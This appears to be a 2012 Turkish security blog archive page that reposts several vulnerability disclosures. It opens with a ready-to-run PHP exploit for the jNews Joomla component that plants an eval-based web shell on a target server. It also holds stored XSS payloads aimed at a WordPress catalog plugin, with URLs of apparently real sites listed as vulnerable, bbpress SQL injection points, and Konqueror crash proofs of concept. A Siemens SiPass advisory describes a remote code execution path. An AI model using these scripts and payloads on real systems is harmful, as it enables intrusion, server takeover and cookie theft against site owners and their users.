Archive for 01 Kasım 2012

jNews com_jnews 7.0.0 => 7.7.5 execute arbitrary PHP code

jNews com_jnews 7.0.0 => 7.7.5 execute arbitrary PHP code

<?php 
 
# jNews 7.0.0 - 7.7.5 ~ Exploit [46] 
# http://hackforums.net/member.php?action=profile&uid=42381 
 
 
echo <<<EOT 
 
----------------------------------- 
/   jNews 7.0.0 - 7.7.5 ~ Exploit   \ 
\           Author: Phizo           / 
----------------------------------- 
 
 
EOT; 
 
 
$options = getopt('u:f:'); 
 
if(!isset($options['u'], $options['f'])) 
die("\n        Usage example: php jnews.php -u http://target.com/ -f shell.php\n 
-u http://target.com/    The full path to Joomla! 
-f shell.php             The name of the file to create.\n"); 
 
$url     =  $options['u']; 
$file    =  $options['f']; 
 
 
$shell = "{$url}components/com_jnews/includes/openflashchart/tmp-upload-images/{$file}"; 
$url   = "{$url}components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name={$file}"; 
 
$data      = "<?php eval(\$_GET['cmd']); ?>"; 
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 
'Content-Type: text/plain'); 
 
 
echo "        [+] Submitting request to: {$options['u']}\n"; 
 
 
$handle = curl_init(); 
 
curl_setopt($handle, CURLOPT_URL, $url); 
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); 
curl_setopt($handle, CURLOPT_POSTFIELDS, $data); 
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); 
 
$source = curl_exec($handle); 
curl_close($handle); 
 
 
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) 
{ 
echo "        [+] Exploit completed successfully!\n"; 
echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n"; 
} 
else
{ 
die("        [+] Exploit was unsuccessful.\n"); 
} 
 
?>  

WordPress Plugin Catalog HTML Code Injection ve XSS

WordPress Plugin Catalog HTML Code Injection and Cross-site scripting XSS Açığı bulunmuş olup açık bulucunun açıklamaları şu şekilde;

Exploit Title: WordPress Plugin Catalog HTML Code Injection and Cross-site scripting 
 
Dork: N/A 
 
Author: Daniel Barragan "D4NB4R" 
 
Twitter: @D4NB4R 
 
Vendor: http://wordpress.org/extend/plugins/catalog/ 
 
Version: 1.1 
 
License: Non-Commercial 
 
Demo: http://www.web-dorado.com/products/wordpress-catalog.html 
 
Download: http://downloads.wordpress.org/plugin/catalog.zip 
 
Tested on: [Linux(Arch)-Windows(7ultimate)] 
 
 
 
Descripcion:  
 
Spider WordPress Product Catalog plugin is a convenient tool for organizing the products represented on  
your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes 
it easier for the customers to search and identify the needed products within the WordPress catalog. It  
is possible to add an unlimited number of parameters for each of the categories in the catalog in order to 
allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can  
be accompanied with an image. 
 
 
Vulnerable Parameter Name:  
 
?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id} 
 
The error occurs when sending product reviews "view=showproduct" allowing the attacker  
to send code to your liking, not $_POST validate the form this code is stored in the db. 
 
 
Exploit 1:   
 
HTML Code Injection  
 
 
 
1. Select any of the products, click and give details or more 
 
2. Once done this post your code on the form with title "Add your comment here".  
 
An example of html: 
 
<center><marquee><h1>HTML code Injection Tested By D4NB4R</h1></marquee></center> 
 
 
 
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id} 
 
 
 
 
Exploit 2:  
 
Cross-site scripting  
 
 
 
1. Select any of the products, click and give details or more 
 
2. Once done this post your code on the form with title "Add your comment here". 
 
An example of possible xss:  
 
<script>alert(document.cookie)</script> 
<script>alert("Xss by D4NB4R")</script> 
 
 
 
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id} 
 
http://richotoole.com/prairiemtn/catalog/ladies/?s_p_c_t=1342&product_id=5&view=showproduct&page_num=1&back=1 
 
http://floralmodelling.com.ua/молды?s_p_c_t=1342&product_id=6&view=showproduct&page_num=1&back=1 
 
http://wpdemo.web-dorado.com/catalog/?s_p_c_t=1342&product_id=4&view=showproduct&page_num=1&back=1 
 
 
Greetz:  All Member Inj3ct0r  Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha 
* shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic 
* Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel 
* L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects 
* aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe 
* ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te  

SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference

IOActive Security Advisory
Title: SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference
Severity: Critical
Discovered by: Lucas Apa
Date Reported: 09/11/12
CVE: TBD
Siemens Advisory: SSA-938777

Introduction

SIEMENS SiPass® Integrated is an extremely powerful and flexible access control system that provides a very high level of security without compromising convenience and ease of access for system users. As a result, thousands of corporations, airports, ports, government agencies, hospitals, universities, and other organizations worldwide are using SiPass integrated access control systems. The system also provides a complete range of reports and can handle a large number of external controls, including elevator controls, alarm outputs, machine controls, and fire alarm inputs.

Affected Products

SIEMENS SiPass Integrated MP2.6 and earlier

Threat and Impact

The vulnerability exists within AscoServer.exe during the handling of RPC messages over the Ethernet Bus. Insufficient sanity checking allows remote and unauthenticated attackers to corrupt a Heap-Allocated Structure and then dereference an arbitrary pointer.
This flaw allows remote attackers to execute arbitrary code on the target system, under the context of the SYSTEM account, where the vulnerable versions of SIEMENS SiPass Integrated are installed.
More advanced payloads could modify the behavior of the application’s internal controllers to unlock doors, control specific hardware, or expose businesses to other security risks.

Technical Details

The main communication channel that the Server uses to communicate with ACC Controllers is Ethernet. Each controller sends and receives messages to and from the Server and the hardware devices that monitor the system. All the components used in the SiPass integrated system are ultimately connected to the Server.

There is virtually no limit to the total number of controllers that can be connected. Various networking options (LAN/WAN/PSTN) can expand the system to include buildings and locations all over the world.

AscoServer is the executable used by the SiPass server that acts as the gateway to remotely access SiPass resources on port 4343.

The Ethernet Bus library connects the Server to the advanced Central Controllers (ACC) and allows communication between the Server and defined devices and points. Ethernet communication means that AscoServer doesn’t need a dedicated Bus, because both Windows and the ACC understand the TCP/IP protocol used to send and receive messages over Ethernet networks.

After creating an I/O completion port with an existing file descriptor, the server begins listening for IOCP messages on that port. When the server receives an IOCP message, it creates substructure elements that are copied into shared memory between threads.

Due to insufficient sanity checking when manipulating an IOCP message, it is possible to alter the behavior of message parsing, allowing another IOCP message to subvert the listener of IOCP messages, leading to export of a write-n primitive.

0BD0F8B4 0B44A7A1 /CALL to memcpy from Ethernet.0B44A79C
0BD0F8B8 0000FE00 |dest = [[[[[user controlled ptr]]]]
0BD0F8BC 0BF0D5D0 |src = 0BF0D5D0 # [[[[[ptr to content]]]]]
0BD0F8C0 00000BB8 n = BB8 (3000.)


This allows an attacker to write arbitrary data within the application, leading to remote code execution. Since the application spawns multiple threads for handling Ethernet connections, one approach for exploiting the vulnerability would be to overwrite a pointer to the first exception handler in any of the Thread Environment Block (TEB) structures and seize control of the exception-handling thread after an access violation. Even though Thread data blocks are randomized, addresses are stable because multiple identical threads are created.

Remediation

For customers of SiPass integrated MP2.4, MP2.5 and MP2.6, Siemens provides a software hotfix that fixes the vulnerability. Please contact customer support to acquire this hotfix. Siemens recommends that customers with earlier versions of SiPass integrated upgrade to one of the above versions. To acquire the software hotfix for SiPass integrated, please contact customer support at:
sp.support.de@siemens.com

Konqueror 4.7.3 Memory Corruption

Konqueror 4.7.3 Memory Corruption Dos/Poc

x-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Nth Dimension Security Advisory (NDSA20121010)
Date: 10th October 2012
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: Konqueror 4.7.3 <http://konqueror.kde.org/>
Vendor: KDE <http://www.kde.org/>
Risk: Medium

Summary

The Konqueror web browser is vulnerable to a number of memory corruption
vulnerabilities.

This advisory comes in 4 related parts:

1) The Konqueror web browser is vulnerable to type confusion leading to memory
disclosure.  The root cause of this is the same as CVE-2010-0046 reported by
Chris Rohlf which affected WebKit.

2) The Konqueror web browser is vulnerable to an out of bounds memory access
when accessing the canvas.  In this case the vulnerability was identified whilst
playing with bug #43813 from Google's Chrome repository.

3) The Konqueror web browser is vulnerable to a NULL pointer dereference leading
to a crash.

4) The Konqueror web browser is vulnerable to a "use-after-free" class flaw when
the context menu is used whilst the document DOM is being changed from within
Javascript.

These flaws were identified during an analysis of previously reported
vulnerabilities that affected Google's Chrome web browser.  It is believed that
only vulnerability 1 is/was common to the two code bases.

After discussions with the vendor, the following CVEs were assigned to these
vulnerabilities:

1) CVE-2012-4512
2) CVE-2012-4513
3) CVE-2012-4514
4) CVE-2012-4515

Solutions

Nth Dimension recommends that the vendor supplied patches should be applied:

1) a872c8a969a8bd3706253d6ba24088e4f07f3352
2) 1f8b1b034ccf1713a5d123a4c327290f86d17d53
3) 65464349951e0df9b5d80c2eb3cc7458d54923ae
4) 4f2eb356f1c23444fff2cfe0a7ae10efe303d6d8

Technical Details

1) Chris's blog post
(http://em386.blogspot.com/2010/12/webkit-css-type-confusion.html) nicely
describes this vulnerability.

It is worth noting that due to an overlap in bugs, our pre-advisory confused
CVE-2010-4577 and CVE-2010-0046.  Red Hat's bug entry for CVE-2010-4577
references the local() CSS function, whilst their bug entry for CVE-2010-0046
references the format() function (on very similar code paths).  In the case of
Konqueror, due to a slight reordering in calls, one patch (for CVE-2012-4512)
actually fixes both the format() and local() issue.

2) There was a sign-extension in calculating the dimensions of the canvas within
scaleLoop , which lead to a miscalculated jump. According to KDE, in the case of
64-bit systems this appeared only to allow a crash to be triggered however on
32-bit systems it could lead to memory disclosure.

The following PoC can trigger the crash on vulnerable versions of Konqueror:

<html>
<body>
<canvas id="tutorial"></canvas>
<script type="text/javascript">
var canvas = document.getElementById("tutorial");
if (canvas.getContext) {
var ctx = canvas.getContext("2d");
canvas.width = 111111;
}
</script>
</body>
</html>

It is worth noting that unlike vulnerability 2, the code here is not shared
between WebKit and Konqueror.

3) Unfortunely I no longer have the stack trace for this crash however it can be
triggered on vulnerable versions of Konqueror using the following PoC:

<html>
<body>
<iframe name="test" src="http://www.google.co.uk"></iframe>
<input type=button value="test"
onclick="window.open('javascript:alert(document.cookie)','test')" >
</body>
</html>

4) By accessing the context menu for a given iframe whilst the iframe is being
updated by the parent can lead to attempts to access no- onger existing objects.
 This may lead to a crash, or potentially code execution, depending on the state
of the process at the point the no-longer existing object is accessed.

The following PoC can trigger the crash on vulnerable versions of Konqueror:

<html>
<body>
<script>
setInterval(function () {
document.body.innerHTML = "<iframe src=about:konqueror></iframe>";
}, 300);
</script>
</body>
</html>

History

On 27th July 2011, Nth Dimension contacted the KDE security team to report
vulnerability 1.

On 7th November 2011, Than Ngo of Red Hat re-reports the vulnerability 1 and
Maksim Orlovich from KDE responds confirming that they have received the report
and it had been escalated to Maksim Orlovich, a KDE developer working on KHTML
to determine the impact.  A proposed patch is made available on 13th November
2010.

Nth Dimension continue to examine bugs in WebKit that have been reported to
Google and on 1st November 2011 report vulnerability 2. Maksim responds quickly
but only to confirm receipt.  There are apparently issues in reproducing
vulnerability 2.  Maksim further responds on the 6th confirming that he now has
it working and has identified the root cause.

On 2nd February 2012, Jeff Mitchell of the KDE security team requests details of
the patches in order to make the vulnerability details public.  Maksim responds
that wires were crossed and he was waiting on KDE security team and Nth
Dimension.  Patch details as above are then supplied,

On 16th February 2012, Nth Dimension report vulnerabilities 3 and 4. The KDE
security team propose rolling all 4 bugs into 1 advisory assuming that the final
2 vulnerabilities can quickly be triaged.  Maksim responds on the 20th
confirming he has them reproduced and offering possible fixes.

Between February and October, Nth Dimension hear no further updates despite
chasing the KDE security team in June.

Nth Dimension proceed to post limited details to oss-security on 10th October
2012.

Following this, representatives from Red Hat and KDE liased with Nth Dimension
to resolve the oustanding issues.  Further patches were supplied by David Faure
of KDE and tested by Jan Lieskovskyi and other members of the Red Hat security
team.  On 26th October 2012 an embargo was agreed to allow Nth Dimension and Red
Hat further time to review the supplied patch for vulnerability 4. KDE will
commit the proposed patch allowing disclosure on, or shortly after 29th October
2012.

Current

As of the 30th October 2012, the state of the vulnerabilities is believed to be
as follows.  Patches have been applied to Konqueror which resolve all
vulnerabilities.

Thanks

Nth Dimension would like to thank Jeff Mitchell, Maksim Orlovich and David Faure
of KDE as well as Jan Lieskovskyi, Vincent Danen, Kurt Seifried of the Red Hat
security team for the way they worked to resolve the issues.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCAAGBQJQj/rqAAoJEPJhpTVyySo7tlwQAINmUg+dLqzH3RCv8inTdcNy
SOZmlAJFQfPpqohOYKL8ahx0Hr70LQgFSP2O2+WG5nbrav8zVsZFQ3Swdl25v9Yg
qFlPAz3XFrwgPnJlr3p18aEksOAqTe3nx3pvqbFDp7iUuOBvoh4HvZF4HfGlIeTQ
kWT7sBJ5IE9XEwq8pPnqTsfppy+1Ul+kjvW0zvBstOWXTCAEC2SUmW7pULlz5Wj3
tQEXlIyEARA6PagBVDV1ibZHWinbavvTeX/Cdqfk0T2VFURE17eA+0jxVejcswsQ
UP7Hc6fBWNb6cW9ruzRxeBNV3VHpqPlOHIyOUowtvc2/A4T2x5bHMIRrkcLJ4G65
WXfXx3iZWdv2omfRRTVUf8qRmwdl36vl2RPJKm1dUzXJBd/FnzpTiIiTdE3sAMHz
S/u+t98tCSVrsFGel7D2+B5QLvWggUkCmUsbn+pn1AADSfDkTNZXQeun3TcrJyV7
b+ziR1fEgrEkTskaB8azc4LZSfGNOjTJCY7eM/0y0n3TIN7+7MXTbqtw9fPBciNG
JAC672UPFN7coc05tH4Za5FFRm+fCmLzFgN8ZP2ciWOBRQBJAyldV+BTQqFPXxQT
shwF8+Q6E4NiW1SbLN7WQJYCL5AbHATu4o5GPRQgkKCE1SSO//fMFbNEMT2VvXeC
X51Xu9FrH4srj3ZMYDhK
=nHWY
-----END PGP SIGNATURE-----

WordPress bbpress Plugin Multiple Vulnerabilities

WordPress bbpress eklentisinde SQL injection açığı bulunmuş olup, açığın bulunduğu dizin ve açığın kullanımına ilişkin açık bulucunun açıklamaları;

Souhail Hammou - Independant Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# Website : www.dark-puzzle.com
# Youtube : http://www.youtube.com/user/mariotrey
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .
===========================================
# Exploit Title: WordPress plugins - bbpress Multiple Vulnerabilities
# Author: Dark-Puzzle (Souhail Hammou)
# OSVDB ID : 86400 & 86399 .
# Vendor Website : www.bbpress.ru  /  www.bbpress.com
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 , Backtrack 5 R3 .
----------------------------------------------------
I - SQL Injection Vulnerability :
----------------------------------------------------
bbpress plugin is prone to an SQL injection Vulnerability .
In cases when you face a valid string column problem try to change syntax or instead spaces add /**/ .

Note: Automated injection can be more effective in this case.

Example : 

http://www.example.com/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject here] 

---------------------------------------------------
II - Full Path Disclosure Vulnerability :
---------------------------------------------------

The Full Path Disclosure vulnerability in bbpress is via Array .

Example :

www.example.com/path/bbpress/topic.php?id[]=12&replies=3

Error : Warning: urlencode() expects parameter 1 to be string, array given in /Full/Path/Here on line 786

---------------------------------------------------
III - Directory Listing Vulnerability :
---------------------------------------------------

www.example.com/PATH/bbpress/bb-templates/kakumei/
www.example.com/PATH/bbpress/bb-templates/kakumei-blue/